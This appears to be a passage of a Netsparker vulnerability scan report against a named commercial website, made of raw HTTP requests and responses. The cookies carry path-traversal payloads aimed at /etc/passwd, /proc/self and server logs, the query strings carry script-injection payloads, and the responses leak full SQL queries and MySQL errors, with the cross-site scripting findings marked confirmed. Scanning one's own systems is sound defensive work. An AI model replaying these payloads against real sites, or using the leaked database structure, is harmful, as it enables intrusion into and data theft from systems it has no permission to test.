OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nas9u8dk8gd7kbcol4ichotvc6; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00054C)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/

/ppc/leadflow/wede00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/?'"--></style></script><script>alert(0x000557)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000557)</script>

Request

GET /ppc/leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o0v0volns4qvantbl87sib7nv5; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000557)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E

/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x00055D)</script>

Request

GET /ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00055D)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3